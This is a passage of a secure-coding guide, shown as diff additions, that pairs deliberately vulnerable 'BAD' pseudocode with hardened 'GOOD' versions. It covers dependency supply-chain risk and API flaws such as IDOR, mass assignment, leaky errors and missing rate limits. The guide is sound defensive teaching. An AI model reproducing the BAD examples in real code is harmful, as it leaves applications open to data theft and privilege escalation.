+ + // Any of those 544 transitive deps could be: + // - Abandoned and vulnerable + // - Taken over by malicious actors + // - Typosquats + // - Compromised in CI/CD +END FUNCTION + +// Event-stream incident: Dependency of dependency was compromised +// ua-parser-js incident: Popular package itself was compromised +// node-ipc incident: Maintainer added malicious code + +// ======================================== +// GOOD: Full dependency tree visibility and control +// ======================================== + +// Step 1: Analyze full dependency tree +FUNCTION analyze_dependency_tree(): + tree = package_manager.get_dependency_tree() + + analysis = { + direct: [], + transitive: [], + depth_stats: {}, + risk_assessment: [] + } + + FOR dep IN tree.flatten(): + IF dep.depth == 1: + analysis.direct.append(dep) + ELSE: + analysis.transitive.append(dep) + END IF + + // Track dependency depth + analysis.depth_stats[dep.depth] = + (analysis.depth_stats[dep.depth] OR 0) + 1 + + // Risk factors for transitive deps + risk_score = calculate_risk(dep) + IF risk_score > THRESHOLD: + analysis.risk_assessment.append({ + package: dep.name, + introduced_by: dep.parent_chain, + risk_score: risk_score, + factors: get_risk_factors(dep) + }) + END IF + END FOR + + RETURN analysis +END FUNCTION + +FUNCTION calculate_risk(dep): + risk = 0 + + // Maintainer factors + IF dep.maintainers.count == 1: + risk += 10 // Single maintainer - bus factor + END IF + + IF dep.last_update > 2_YEARS_AGO: + risk += 20 // Abandoned package + END IF + + // Security factors + IF dep.vulnerability_count > 0: + risk += dep.vulnerability_count * 15 + END IF + + IF dep.has_install_scripts: + risk += 25 // Runs code on install + END IF + + // Popularity/trust factors + IF dep.weekly_downloads < 1000: + risk += 10 // Low usage + END IF + + IF NOT dep.has_types AND dep.is_js: + risk += 5 // Less maintained indicator + END IF + + RETURN risk +END FUNCTION + +// Step 2: Detect and alert on risky transitive deps 
+FUNCTION monitor_transitive_deps(): + tree = get_dependency_tree() + + FOR dep IN tree.flatten(): + // Check for suspicious characteristics + IF dep.has_install_scripts: + log.warn("Package has install scripts", { + package: dep.name, + path: dep.parent_chain + }) + // Review install scripts for malicious code + scripts = get_install_scripts(dep) + FOR script IN scripts: + IF contains_suspicious_patterns(script): + THROW SecurityError("Suspicious install script in: " + dep.name) + END IF + END FOR + END IF + + // Check for native code compilation + IF dep.has_native_code: + log.warn("Package compiles native code", { + package: dep.name + }) + END IF + + // Check for network access + IF dep.makes_network_requests: + log.warn("Package makes network requests", { + package: dep.name + }) + END IF + END FOR +END FUNCTION + +// Step 3: Use dependency scanning that covers transitives +FUNCTION full_dependency_scan(): + // Scan all dependencies, not just direct + scan_result = security_scanner.scan({ + include_transitive: TRUE, + include_dev_dependencies: TRUE, + scan_depth: "all" // Not just top-level + }) + + FOR vuln IN scan_result.vulnerabilities: + // Show the path that introduces the vulnerability + log.error("Vulnerability found", { + package: vuln.package, + version: vuln.version, + severity: vuln.severity, + introduced_through: vuln.dependency_path, // e.g., "express > body-parser > qs" + recommendation: vuln.recommendation + }) + END FOR + + RETURN scan_result +END FUNCTION + +// Step 4: Consider dependency vendoring for critical deps +FUNCTION vendor_critical_dependency(package_name): + // Download specific version + content = download_verified( + get_package_url(package_name), + get_expected_hash(package_name) + ) + + // Store in vendor directory (committed to repo) + write_file("vendor/" + package_name, content) + + // Point imports to vendored version + configure_import_alias(package_name, "./vendor/" + package_name) + + // Vendored code is: + // - Not 
automatically updated (reduces surprise changes) + // - Under your source control (auditable) + // - Not subject to registry compromise +END FUNCTION + +// Step 5: Use SBOM (Software Bill of Materials) +FUNCTION generate_sbom(): + sbom = { + format: "CycloneDX", // or SPDX + components: [], + dependencies: [] + } + + FOR dep IN get_all_dependencies(): + sbom.components.append({ + type: "library", + name: dep.name, + version: dep.version, + purl: "pkg:npm/" + dep.name + "@" + dep.version, + hashes: [ + {algorithm: "SHA-256", content: dep.sha256} + ], + licenses: dep.licenses, + supplier: dep.publisher + }) + END FOR + + // Export for vulnerability tracking + write_file("sbom.json", json.encode(sbom)) + + // Submit to vulnerability database for ongoing monitoring + vuln_service.monitor_sbom(sbom) +END FUNCTION +``` + +--- + +## 9. API Security + +**CWE References:** CWE-284 (Improper Access Control), CWE-639 (IDOR), CWE-915 (Mass Assignment), CWE-200 (Exposure of Sensitive Information), CWE-770 (Resource Allocation Without Limits), CWE-209 (Error Message Information Exposure) +**Severity:** Critical to High | **Related:** [[API-Security]] + +> **Risk:** APIs are the primary attack surface for modern applications. Missing authentication, broken authorization (IDOR), and mass assignment vulnerabilities allow attackers to access or modify data belonging to other users, escalate privileges, and exfiltrate sensitive information. AI frequently generates API endpoints without proper security controls. 
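Two of the failure modes named in the risk note above, broken object-level authorization and mass assignment, both come down to trusting client-supplied values. The following is a minimal Python sketch, not a definitive implementation. It assumes an in-memory `ORDERS` dict in place of a real data layer, and every name in it (`User`, `get_order_for`, `apply_profile_update`, `UPDATABLE_FIELDS`, `Forbidden`, `NotFound`) is hypothetical.

```python
from dataclasses import dataclass


@dataclass
class User:
    id: str
    role: str = "user"


class Forbidden(Exception):
    """The authenticated user may not touch this resource."""


class NotFound(Exception):
    """No resource with this ID exists."""


# Hypothetical in-memory store standing in for a database.
ORDERS = {
    "o-1": {"id": "o-1", "owner_id": "u-1", "total_cents": 1200},
    "o-2": {"id": "o-2", "owner_id": "u-2", "total_cents": 900},
}

# Fields a user may change on their own profile; anything else is ignored.
UPDATABLE_FIELDS = ("name", "email")


def get_order_for(user, order_id):
    """Return the order only if the authenticated user owns it or is an admin."""
    order = ORDERS.get(order_id)
    if order is None:
        raise NotFound(order_id)
    if order["owner_id"] != user.id and user.role != "admin":
        raise Forbidden(order_id)
    return order


def apply_profile_update(profile, body):
    """Copy only allowlisted fields from the request body onto a new profile dict."""
    updated = dict(profile)
    for field in UPDATABLE_FIELDS:
        if field in body:
            updated[field] = body[field]
    return updated
```

The ownership check keys off the authenticated `user`, never an ID from the request, and the allowlist means a body such as `{"role": "admin"}` changes nothing.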
+ +### 9.1 Missing Authentication on Endpoints + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Unprotected API endpoints +// ======================================== + +// No authentication - anyone can access +@route("/api/users") +FUNCTION get_all_users(): + RETURN database.query("SELECT * FROM users") +END FUNCTION + +// Admin functionality without auth check +@route("/api/admin/delete-user/{id}") +FUNCTION admin_delete_user(id): + database.execute("DELETE FROM users WHERE id = ?", [id]) + RETURN {status: "deleted"} +END FUNCTION + +// Sensitive data exposed without auth +@route("/api/orders/{order_id}") +FUNCTION get_order(order_id): + RETURN database.get_order(order_id) +END FUNCTION + +// "Security through obscurity" - hidden endpoint still accessible +@route("/api/internal/debug-info") +FUNCTION get_debug_info(): + RETURN { + database_connection: DB_STRING, + api_keys: LOADED_KEYS, + server_config: CONFIG + } +END FUNCTION + +// ======================================== +// GOOD: Authentication on all protected endpoints +// ======================================== + +// Middleware to enforce authentication +FUNCTION require_auth(handler): + RETURN FUNCTION wrapped(request): + token = request.headers.get("Authorization") + + IF token IS NULL: + RETURN response(401, {error: "Authentication required"}) + END IF + + user = verify_token(token) + IF user IS NULL: + RETURN response(401, {error: "Invalid or expired token"}) + END IF + + request.user = user + RETURN handler(request) + END FUNCTION +END FUNCTION + +// Middleware for admin-only routes +FUNCTION require_admin(handler): + RETURN require_auth(FUNCTION wrapped(request): + IF request.user.role != "admin": + log.security("Unauthorized admin access attempt", { + user_id: request.user.id, + endpoint: request.path + }) + RETURN response(403, {error: "Admin access required"}) + END IF + + RETURN handler(request) + END FUNCTION) +END FUNCTION + +// 
Protected endpoints with proper auth +@route("/api/users") +@require_admin // Only admins can list all users +FUNCTION get_all_users(request): + // Return only non-sensitive fields + users = database.query("SELECT id, name, email, created_at FROM users") + RETURN response(200, {users: users}) +END FUNCTION + +// Admin endpoint with proper protection +@route("/api/admin/delete-user/{id}") +@require_admin +FUNCTION admin_delete_user(request, id): + // Audit log before action + log.audit("User deletion", { + admin_id: request.user.id, + target_user_id: id + }) + + database.soft_delete("users", id) // Soft delete for audit trail + RETURN response(200, {status: "deleted"}) +END FUNCTION + +// Never expose internal/debug endpoints in production +IF environment != "production": + @route("/api/internal/debug-info") + @require_admin + FUNCTION get_debug_info(request): + RETURN {config: get_safe_config()} // Sanitized config only + END FUNCTION +END IF + +// Default deny - explicitly define allowed public endpoints +PUBLIC_ENDPOINTS = [ + "/api/auth/login", + "/api/auth/register", + "/api/public/status", + "/api/public/docs" +] + +FUNCTION global_auth_middleware(request): + IF request.path IN PUBLIC_ENDPOINTS: + RETURN next(request) + END IF + + // All other routes require authentication by default + RETURN require_auth(next)(request) +END FUNCTION +``` + +### 9.2 Broken Object-Level Authorization (IDOR) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: IDOR vulnerabilities - no ownership check +// ======================================== + +// Attacker changes user_id in URL to access others' data +@route("/api/users/{user_id}/profile") +@require_auth +FUNCTION get_user_profile(request, user_id): + // VULNERABLE: No check that user_id belongs to authenticated user + profile = database.get_profile(user_id) + RETURN response(200, profile) +END FUNCTION + +// Attacker can delete any order by changing order_id 
+@route("/api/orders/{order_id}") +@require_auth +FUNCTION delete_order(request, order_id): + // VULNERABLE: Deletes any order regardless of owner + database.delete("orders", order_id) + RETURN response(200, {status: "deleted"}) +END FUNCTION + +// Attacker accesses any document by guessing/incrementing ID +@route("/api/documents/{doc_id}") +@require_auth +FUNCTION get_document(request, doc_id): + // VULNERABLE: Sequential IDs make enumeration easy + doc = database.get_document(doc_id) + RETURN response(200, doc) +END FUNCTION + +// Horizontal privilege escalation via parameter tampering +@route("/api/transfer") +@require_auth +FUNCTION transfer_funds(request): + // VULNERABLE: from_account comes from user input + from_account = request.body.from_account + to_account = request.body.to_account + amount = request.body.amount + + execute_transfer(from_account, to_account, amount) + RETURN response(200, {status: "transferred"}) +END FUNCTION + +// ======================================== +// GOOD: Proper object-level authorization +// ======================================== + +// Always verify ownership before access +@route("/api/users/{user_id}/profile") +@require_auth +FUNCTION get_user_profile(request, user_id): + // SECURE: Verify user can only access their own profile + IF user_id != request.user.id AND request.user.role != "admin": + log.security("IDOR attempt blocked", { + authenticated_user: request.user.id, + attempted_access: user_id + }) + RETURN response(403, {error: "Access denied"}) + END IF + + profile = database.get_profile(user_id) + IF profile IS NULL: + RETURN response(404, {error: "Profile not found"}) + END IF + + RETURN response(200, profile) +END FUNCTION + +// Resource ownership verification +@route("/api/orders/{order_id}") +@require_auth +FUNCTION delete_order(request, order_id): + order = database.get_order(order_id) + + IF order IS NULL: + RETURN response(404, {error: "Order not found"}) + END IF + + // SECURE: Verify ownership before 
action + IF order.user_id != request.user.id: + log.security("Unauthorized order deletion attempt", { + user_id: request.user.id, + order_id: order_id, + owner_id: order.user_id + }) + RETURN response(403, {error: "Access denied"}) + END IF + + // Additional business logic check + IF order.status == "shipped": + RETURN response(400, {error: "Cannot delete shipped orders"}) + END IF + + database.delete("orders", order_id) + RETURN response(200, {status: "deleted"}) +END FUNCTION + +// Use UUIDs instead of sequential IDs to prevent enumeration +FUNCTION create_document(request): + doc_id = generate_uuid() // Not sequential, not guessable + + database.insert("documents", { + id: doc_id, + owner_id: request.user.id, + content: request.body.content + }) + + RETURN response(201, {id: doc_id}) +END FUNCTION + +// Implicit ownership from authenticated user +@route("/api/transfer") +@require_auth +FUNCTION transfer_funds(request): + // SECURE: from_account MUST belong to authenticated user + from_account = database.get_account(request.body.from_account) + + IF from_account IS NULL OR from_account.owner_id != request.user.id: + RETURN response(403, {error: "Invalid source account"}) + END IF + + to_account = database.get_account(request.body.to_account) + IF to_account IS NULL: + RETURN response(404, {error: "Destination account not found"}) + END IF + + amount = request.body.amount + IF amount <= 0 OR amount > from_account.balance: + RETURN response(400, {error: "Invalid amount"}) + END IF + + execute_transfer(from_account.id, to_account.id, amount) + + log.audit("Funds transfer", { + user_id: request.user.id, + from: from_account.id, + to: to_account.id, + amount: amount + }) + + RETURN response(200, {status: "transferred"}) +END FUNCTION + +// Reusable authorization decorator +FUNCTION authorize_resource(resource_type, id_param): + RETURN FUNCTION decorator(handler): + RETURN FUNCTION wrapped(request): + resource_id = request.params[id_param] + resource = 
database.get(resource_type, resource_id) + + IF resource IS NULL: + RETURN response(404, {error: resource_type + " not found"}) + END IF + + IF NOT can_access(request.user, resource): + log.security("Authorization failed", { + user_id: request.user.id, + resource_type: resource_type, + resource_id: resource_id + }) + RETURN response(403, {error: "Access denied"}) + END IF + + request.resource = resource + RETURN handler(request) + END FUNCTION + END FUNCTION +END FUNCTION + +// Usage +@route("/api/documents/{doc_id}") +@require_auth +@authorize_resource("documents", "doc_id") +FUNCTION get_document(request, doc_id): + RETURN response(200, request.resource) // Already verified +END FUNCTION +``` + +### 9.3 Mass Assignment Vulnerabilities + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Mass assignment - accepting all user input +// ======================================== + +// Attacker sends: {"name": "John", "role": "admin", "balance": 999999} +@route("/api/users/update") +@require_auth +FUNCTION update_user(request): + // VULNERABLE: Directly assigns all request body fields + user = database.get_user(request.user.id) + + FOR field, value IN request.body: + user[field] = value // Attacker can set ANY field! + END FOR + + database.save(user) + RETURN response(200, user) +END FUNCTION + +// ORM auto-mapping vulnerability +@route("/api/users") +@require_auth +FUNCTION create_user(request): + // VULNERABLE: ORM creates user from all request fields + user = User.create(request.body) // Includes role, isAdmin, etc.! 
+ RETURN response(201, user) +END FUNCTION + +// Nested object mass assignment +@route("/api/orders") +@require_auth +FUNCTION create_order(request): + // VULNERABLE: Nested payment object can set price + order = Order.create({ + user_id: request.user.id, + items: request.body.items, + payment: request.body.payment // Attacker sets payment.amount = 0 + }) + RETURN response(201, order) +END FUNCTION + +// ======================================== +// GOOD: Explicit field allowlisting +// ======================================== + +// Define what fields can be updated +CONSTANT USER_UPDATABLE_FIELDS = ["name", "email", "phone", "address"] +CONSTANT USER_ADMIN_FIELDS = ["role", "status", "verified"] + +@route("/api/users/update") +@require_auth +FUNCTION update_user_secure(request): + user = database.get_user(request.user.id) + + // SECURE: Only update explicitly allowed fields + FOR field IN USER_UPDATABLE_FIELDS: + IF field IN request.body: + user[field] = sanitize(request.body[field]) + END IF + END FOR + + database.save(user) + + // Return only safe fields + RETURN response(200, user.to_public_dict()) +END FUNCTION + +// Admin with different field permissions +@route("/api/admin/users/{user_id}") +@require_admin +FUNCTION admin_update_user(request, user_id): + user = database.get_user(user_id) + + IF user IS NULL: + RETURN response(404, {error: "User not found"}) + END IF + + // Admins can update more fields, but still allowlisted + allowed_fields = USER_UPDATABLE_FIELDS + USER_ADMIN_FIELDS + changed_fields = [] + + FOR field IN allowed_fields: + IF field IN request.body: + user[field] = request.body[field] + changed_fields.append(field) + END IF + END FOR + + log.audit("Admin user update", { + admin_id: request.user.id, + user_id: user_id, + fields_changed: changed_fields // Only fields actually applied, not every key the client sent + }) + + database.save(user) + RETURN response(200, user) +END FUNCTION + +// Use DTOs (Data Transfer Objects) for input +CLASS UserUpdateDTO: + name: String (max_length=100) + email: String (email_format, max_length=255) + phone: String (phone_format, optional) + address: String (max_length=500, optional) + + FUNCTION 
from_request(body): + dto = UserUpdateDTO() + dto.name = validate_string(body.name, max_length=100) + dto.email = validate_email(body.email) + dto.phone = validate_phone(body.phone) IF body.phone ELSE NULL + dto.address = validate_string(body.address, max_length=500) IF body.address ELSE NULL + RETURN dto + END FUNCTION +END CLASS + +@route("/api/users/update") +@require_auth +FUNCTION update_user_dto(request): + TRY: + dto = UserUpdateDTO.from_request(request.body) + CATCH ValidationError as e: + RETURN response(400, {error: e.message}) + END TRY + + user = database.get_user(request.user.id) + user.apply_dto(dto) // Only applies DTO fields + database.save(user) + + RETURN response(200, user.to_public_dict()) +END FUNCTION + +// Nested objects with strict validation +CLASS OrderCreateDTO: + items: Array of OrderItemDTO + shipping_address_id: UUID + // payment calculated server-side, NOT from request + + FUNCTION from_request(body, user): + dto = OrderCreateDTO() + dto.items = [OrderItemDTO.from_request(item) FOR item IN body.items] + + // Verify address belongs to user + address = database.get_address(body.shipping_address_id) + IF address IS NULL OR address.user_id != user.id: + THROW ValidationError("Invalid shipping address") + END IF + dto.shipping_address_id = address.id + + RETURN dto + END FUNCTION +END CLASS + +@route("/api/orders") +@require_auth +FUNCTION create_order_secure(request): + dto = OrderCreateDTO.from_request(request.body, request.user) + + // Calculate payment server-side from validated items + total = 0 + FOR item IN dto.items: + product = database.get_product(item.product_id) + total += product.price * item.quantity // Price from DB, not request! 
+ END FOR + + order = Order.create({ + user_id: request.user.id, + items: dto.items, + shipping_address_id: dto.shipping_address_id, + total: total // Server-calculated + }) + + RETURN response(201, order.to_dict()) +END FUNCTION +``` + +### 9.4 Excessive Data Exposure + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Exposing too much data in API responses +// ======================================== + +// Returns entire user object including sensitive fields +@route("/api/users/{user_id}") +@require_auth +FUNCTION get_user(request, user_id): + user = database.get_user(user_id) + RETURN response(200, user) // Includes password_hash, SSN, internal_notes! +END FUNCTION + +// Returns all columns from database +@route("/api/orders") +@require_auth +FUNCTION get_orders(request): + orders = database.query("SELECT * FROM orders WHERE user_id = ?", + [request.user.id]) + RETURN response(200, orders) // Includes internal pricing, profit margins +END FUNCTION + +// Exposes related entities without filtering +@route("/api/products/{id}") +FUNCTION get_product(request, id): + product = database.get_product_with_relations(id) + RETURN response(200, product) // Includes supplier.contact, supplier.cost +END FUNCTION + +// Debug info in production responses +@route("/api/search") +FUNCTION search(request): + results = database.search(request.query.q) + RETURN response(200, { + results: results, + query_time_ms: results.execution_time, + sql_query: results.raw_query, // Exposes DB schema! 
+ server_id: SERVER_ID + }) +END FUNCTION + +// ======================================== +// GOOD: Response filtering and DTOs +// ======================================== + +// Define response schemas +CLASS UserPublicResponse: + id: UUID + name: String + avatar_url: String + created_at: DateTime + + FUNCTION from_user(user): + RETURN { + id: user.id, + name: user.name, + avatar_url: user.avatar_url, + created_at: user.created_at + } + END FUNCTION +END CLASS + +CLASS UserPrivateResponse: // For the user themselves + id: UUID + name: String + email: String + phone: String (masked) + avatar_url: String + created_at: DateTime + preferences: Object + + FUNCTION from_user(user): + RETURN { + id: user.id, + name: user.name, + email: user.email, + phone: mask_phone(user.phone), // Show only last 4 digits + avatar_url: user.avatar_url, + created_at: user.created_at, + preferences: user.preferences + } + END FUNCTION +END CLASS + +@route("/api/users/{user_id}") +@require_auth +FUNCTION get_user_filtered(request, user_id): + user = database.get_user(user_id) + + IF user IS NULL: + RETURN response(404, {error: "User not found"}) + END IF + + // Different responses based on who's requesting + IF user_id == request.user.id: + RETURN response(200, UserPrivateResponse.from_user(user)) + ELSE: + RETURN response(200, UserPublicResponse.from_user(user)) + END IF +END FUNCTION + +// Explicit field selection in queries +@route("/api/orders") +@require_auth +FUNCTION get_orders_filtered(request): + // Only select fields needed for the response + orders = database.query( + "SELECT id, status, total, created_at, shipping_address " + + "FROM orders WHERE user_id = ?", + [request.user.id] + ) + + RETURN response(200, { + orders: orders.map(order => OrderResponse.from_order(order)) + }) +END FUNCTION + +// Filter nested relations +CLASS ProductResponse: + id: UUID + name: String + description: String + price: Decimal + category: String + images: Array + average_rating: Float + // 
Excludes: cost, supplier, profit_margin, internal_notes + + FUNCTION from_product(product): + RETURN { + id: product.id, + name: product.name, + description: product.description, + price: product.price, + category: product.category.name, // Only category name + images: product.images.map(i => i.url), // Only URLs + average_rating: product.average_rating + } + END FUNCTION +END CLASS + +// GraphQL field filtering +FUNCTION resolve_user(parent, args, context): + user = database.get_user(args.id) + + // Check each requested field + allowed_fields = get_allowed_fields(context.user, user) + + result = {} + FOR field IN context.requested_fields: + IF field IN allowed_fields: + result[field] = user[field] + ELSE: + result[field] = NULL // Or omit entirely + END IF + END FOR + + RETURN result +END FUNCTION + +// Never expose internal debugging info +@route("/api/search") +FUNCTION search_safe(request): + results = database.search(request.query.q) + + RETURN response(200, { + results: results.items.map(item => item.to_public_dict()), + total: results.total_count, + page: results.page + // No query_time_ms, sql_query, or server_id + }) +END FUNCTION + +// Pagination to prevent data dumping +@route("/api/users") +@require_admin +FUNCTION list_users(request): + page = INT(request.query.page, default=1) + per_page = MIN(INT(request.query.per_page, default=20), 100) // Max 100 + + users = database.paginate("users", page, per_page) + + RETURN response(200, { + users: users.map(u => UserAdminResponse.from_user(u)), + pagination: { + page: page, + per_page: per_page, + total_pages: users.total_pages, + total_count: users.total_count + } + }) +END FUNCTION +``` + +### 9.5 Missing Rate Limiting + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: No rate limiting +// ======================================== + +// Login endpoint vulnerable to brute force +@route("/api/auth/login") +FUNCTION login(request): + user = 
database.find_by_email(request.body.email) + + IF user IS NULL OR NOT verify_password(request.body.password, user.password_hash): + RETURN response(401, {error: "Invalid credentials"}) + END IF + + RETURN response(200, {token: create_token(user)}) +END FUNCTION + +// Expensive operation with no limits +@route("/api/reports/generate") +@require_auth +FUNCTION generate_report(request): + // CPU-intensive, no limits - easy DoS + report = generate_complex_report(request.body.params) + RETURN response(200, report) +END FUNCTION + +// SMS/email sending without limits +@route("/api/auth/send-verification") +FUNCTION send_verification(request): + // Attacker can spam any phone/email + send_sms(request.body.phone, generate_code()) + RETURN response(200, {status: "sent"}) +END FUNCTION + +// ======================================== +// GOOD: Comprehensive rate limiting +// ======================================== + +// Rate limiter configuration +rate_limits = { + // Per IP limits + "ip:global": {limit: 1000, window: "1 hour"}, + "ip:auth": {limit: 10, window: "15 minutes"}, + "ip:sensitive": {limit: 5, window: "1 minute"}, + + // Per user limits + "user:global": {limit: 5000, window: "1 hour"}, + "user:write": {limit: 100, window: "1 hour"}, + + // Per resource limits + "resource:reports": {limit: 10, window: "1 hour"} +} + +FUNCTION rate_limit(key_type, key_suffix=""): + RETURN FUNCTION decorator(handler): + RETURN FUNCTION wrapped(request): + config = rate_limits[key_type] + + // Build rate limit key + IF key_type.starts_with("ip:"): + key = key_type + ":" + request.client_ip + key_suffix + ELSE IF key_type.starts_with("user:"): + IF request.user IS NULL: + RETURN response(401, {error: "Authentication required"}) + END IF + key = key_type + ":" + request.user.id + key_suffix + ELSE: + key = key_type + key_suffix + END IF + + // Check rate limit + current = redis.incr(key) + IF current == 1: + redis.expire(key, config.window) + END IF + + IF current > config.limit: + 
retry_after = redis.ttl(key) + log.security("Rate limit exceeded", { + key: key, + ip: request.client_ip, + user_id: request.user.id IF request.user ELSE NULL + }) + RETURN response(429, { + error: "Too many requests", + retry_after: retry_after + }, headers={"Retry-After": retry_after}) + END IF + + // Add rate limit headers (named result to avoid shadowing the response() helper) + result = handler(request) + result.headers["X-RateLimit-Limit"] = config.limit + result.headers["X-RateLimit-Remaining"] = config.limit - current + result.headers["X-RateLimit-Reset"] = redis.ttl(key) + + RETURN result + END FUNCTION + END FUNCTION +END FUNCTION + +// Login with rate limiting +@route("/api/auth/login") +@rate_limit("ip:auth") +FUNCTION login_protected(request): + email = request.body.email + + // Additional per-account rate limiting + account_key = "auth:account:" + sha256(email) + attempts = redis.incr(account_key) + IF attempts == 1: + redis.expire(account_key, 3600) // 1 hour + END IF + + IF attempts > 5: + // Lock account temporarily + log.security("Account locked due to failed attempts", { + email_hash: sha256(email) // Don't log raw email + }) + RETURN response(423, { + error: "Account temporarily locked", + retry_after: redis.ttl(account_key) + }) + END IF + + user = database.find_by_email(email) + + IF user IS NULL OR NOT verify_password(request.body.password, user.password_hash): + // Counter is left in place on failure so repeated failures accumulate toward the lockout + RETURN response(401, {error: "Invalid credentials"}) + END IF + + // Reset counter on successful login + redis.delete(account_key) + + RETURN response(200, {token: create_token(user)}) +END FUNCTION + +// Expensive operations with strict limits +@route("/api/reports/generate") +@require_auth +@rate_limit("user:write") +@rate_limit("resource:reports") +FUNCTION generate_report_limited(request): + // Reject if the user already has too many reports in progress; otherwise queue for async processing + active_reports = get_active_report_count(request.user.id) + + IF active_reports > 3: + RETURN response(429, {error: "Too many reports in progress"}) + END IF + + job_id = 
queue_report_generation(request.user.id, request.body.params) + + RETURN response(202, { + job_id: job_id, + status: "queued", + estimated_time: estimate_completion_time() + }) +END FUNCTION + +// SMS/email with phone/email-specific limits +@route("/api/auth/send-verification") +@rate_limit("ip:sensitive") +FUNCTION send_verification_limited(request): + phone = request.body.phone + + // Rate limit per phone number + phone_key = "verify:phone:" + sha256(phone) + count = redis.incr(phone_key) + IF count == 1: + redis.expire(phone_key, 3600) // 1 hour + END IF + + IF count > 3: + RETURN response(429, { + error: "Too many verification requests for this number" + }) + END IF + + // Verify phone format before sending + IF NOT is_valid_phone(phone): + RETURN response(400, {error: "Invalid phone number"}) + END IF + + code = generate_secure_code() + redis.setex("verify:code:" + sha256(phone), 600, code) // 10 min expiry + + send_sms(phone, "Your code: " + code) + + RETURN response(200, {status: "sent"}) +END FUNCTION + +// Sliding window rate limiter for more precise control +FUNCTION sliding_window_limit(key, limit, window_seconds): + now = current_timestamp() + window_start = now - window_seconds + + // Remove old entries + redis.zremrangebyscore(key, "-inf", window_start) + + // Count current window + count = redis.zcard(key) + + IF count >= limit: + RETURN FALSE + END IF + + // Add current request + redis.zadd(key, now, generate_uuid()) + redis.expire(key, window_seconds) + + RETURN TRUE +END FUNCTION +``` + +### 9.6 Improper Error Handling in APIs + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Error messages revealing internal details +// ======================================== + +// Exposes database structure +@route("/api/users/{id}") +FUNCTION get_user_bad_errors(request, id): + TRY: + user = database.get_user(id) + RETURN response(200, user) + CATCH DatabaseError as e: + // VULNERABLE: Exposes 
table names, query structure + RETURN response(500, { + error: "Database error", + query: "SELECT * FROM users WHERE id = " + id, + message: e.message, // "Column 'password_hash' cannot be null" + stack_trace: e.stack_trace + }) + END TRY +END FUNCTION + +// Reveals filesystem paths +@route("/api/files/{file_id}") +FUNCTION get_file_bad(request, file_id): + TRY: + content = read_file("/var/app/uploads/" + file_id) + RETURN response(200, content) + CATCH FileNotFoundError as e: + // VULNERABLE: Exposes server filesystem structure + RETURN response(404, { + error: "File not found: /var/app/uploads/" + file_id, + available_files: list_directory("/var/app/uploads/") + }) + END TRY +END FUNCTION + +// Authentication timing oracle +@route("/api/auth/login") +FUNCTION login_timing_oracle(request): + user = database.find_by_email(request.body.email) + + IF user IS NULL: + // Returns immediately - attacker knows email doesn't exist + RETURN response(401, {error: "User not found"}) + END IF + + IF NOT verify_password(request.body.password, user.password_hash): + // Takes longer due to password verification + RETURN response(401, {error: "Invalid password"}) + END IF + + RETURN response(200, {token: create_token(user)}) +END FUNCTION + +// Inconsistent error format breaks security tools +@route("/api/orders") +FUNCTION create_order_inconsistent(request): + IF NOT valid_items(request.body.items): + RETURN response(400, "Invalid items") // String + END IF + + IF NOT has_stock(request.body.items): + RETURN response(400, {msg: "Out of stock"}) // Different key + END IF + + IF payment_failed: + RETURN {status: "error", reason: "Payment failed"} // No status code + END IF +END FUNCTION + +// ======================================== +// GOOD: Secure, consistent error handling +// ======================================== + +// Standardized error response class +CLASS APIError: + status: Integer + code: String // Machine-readable error code + message: String // User-friendly message + 
request_id: String // For support/debugging + + FUNCTION to_response(): + RETURN response(this.status, { + error: { + code: this.code, + message: this.message, + request_id: this.request_id + } + }) + END FUNCTION +END CLASS + +// Error codes mapping (documented in API docs) +ERROR_CODES = { + "AUTH_REQUIRED": {status: 401, message: "Authentication required"}, + "AUTH_INVALID": {status: 401, message: "Invalid credentials"}, + "FORBIDDEN": {status: 403, message: "Access denied"}, + "NOT_FOUND": {status: 404, message: "Resource not found"}, + "VALIDATION_ERROR": {status: 400, message: "Invalid request data"}, + "RATE_LIMITED": {status: 429, message: "Too many requests"}, + "INTERNAL_ERROR": {status: 500, message: "An unexpected error occurred"} +} + +// Global error handler +FUNCTION global_error_handler(error, request): + request_id = generate_request_id() + + // Log full error details internally + log.error("Request failed", { + request_id: request_id, + path: request.path, + method: request.method, + user_id: request.user.id IF request.user ELSE NULL, + error_type: error.type, + error_message: error.message, + stack_trace: error.stack_trace, + request_body: redact_sensitive(request.body) + }) + + // Return sanitized error to client + IF error IS APIError: + error.request_id = request_id + RETURN error.to_response() + ELSE IF error IS ValidationError: + RETURN APIError( + status=400, + code="VALIDATION_ERROR", + message=error.user_message, // Safe message + request_id=request_id + ).to_response() + ELSE: + // Generic error - never expose internal details + RETURN APIError( + status=500, + code="INTERNAL_ERROR", + message="An unexpected error occurred. 
Reference: " + request_id, + request_id=request_id + ).to_response() + END IF +END FUNCTION + +// Secure authentication with constant-time comparison +@route("/api/auth/login") +FUNCTION login_secure_errors(request): + email = request.body.email + password = request.body.password + + user = database.find_by_email(email) + + // Always perform password check to prevent timing oracle + IF user IS NOT NULL: + password_valid = constant_time_compare( + hash_password(password, user.salt), + user.password_hash + ) + ELSE: + // Fake password check to maintain consistent timing + constant_time_compare( + hash_password(password, generate_fake_salt()), + DUMMY_HASH + ) + password_valid = FALSE + END IF + + IF NOT password_valid: + // Same error message whether user exists or not + log.security("Failed login attempt", { + email_hash: sha256(email), // Don't log raw email + ip: request.client_ip + }) + RETURN APIError( + status=401, + code="AUTH_INVALID", + message="Invalid email or password" + ).to_response() + END IF + + RETURN response(200, {token: create_token(user)}) +END FUNCTION + +// File operations without path disclosure +@route("/api/files/{file_id}") +FUNCTION get_file_secure(request, file_id): + // Validate file_id format (UUID only) + IF NOT is_valid_uuid(file_id): + RETURN APIError( + status=400, + code="VALIDATION_ERROR", + message="Invalid file ID format" + ).to_response() + END IF + + // Look up file in database (not filesystem path) + file_record = database.get_file(file_id) + + IF file_record IS NULL: + RETURN APIError( + status=404, + code="NOT_FOUND", + message="File not found" + ).to_response() + END IF + + // Check ownership + IF file_record.owner_id != request.user.id: + // Same error as not found - don't reveal existence + RETURN APIError( + status=404, + code="NOT_FOUND", + message="File not found" + ).to_response() + END IF + + TRY: + content = storage.read(file_record.storage_key) + RETURN response(200, content, headers={ + "Content-Type": 
